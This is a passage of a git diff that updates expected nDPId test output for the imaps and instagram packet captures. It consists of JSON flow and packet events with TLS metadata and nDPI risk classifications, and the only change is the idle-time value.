-01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590857744659,"flow_last_seen":1590857744659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1590857744659,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590857744659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1590857744659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+f\/AqAEIp2PXpMVKA+HRNM\/NAAAAALAC\/\/\/ajwAAAgQFtAEDAwUBAQgKFE2dOQAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1590857744706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1590857744706,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBgSnY9ekwKgBCAPhxUrMi6La0TTPzqAS\/ojr6QAAAgQFrAQCCAqpw+fsFE2dOQEDAwc="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1590857744706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1590857744706,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+gvAqAEIp2PXpMVKA+HRNM\/OzIui24AQECwI4wAAAQEIChRNnWGpw+fs"} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1590857744659,"flow_last_seen":1590857744710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1590857744710,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01008{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1590857744659,"flow_last_seen":1590857744765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3107,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1590857744765,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mail.ntop.org","server_names":"mail.ntop.org","ja3":"4923a265be4d81c68ecda45bb89cdf6a","ja3s":"b653c251b0ee54c3088fe7bb997cf59d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=mail.ntop.org","fingerprint":"F1:9A:35:30:96:57:5E:56:81:28:2C:D9:45:A5:83:21:9E:E8:C5:DF"}} 
+00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1590857744659,"flow_last_seen":1590857744987,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3856,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1590857744987,"l3_proto":"ip4","src_ip":"192.168.1.8","dst_ip":"167.99.215.164","src_port":50506,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"imaps.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":3856,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1590857744987} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 diff --git a/test/results/instagram.pcap.out b/test/results/instagram.pcap.out index 8b0443646..75486aa4d 100644 --- a/test/results/instagram.pcap.out +++ b/test/results/instagram.pcap.out 
@@ -1,47 +1,47 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"instagram.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436720898354} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898354,"flow_last_seen":1436720898354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720898354,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7440000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfA
nCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"} 
-00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9
t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
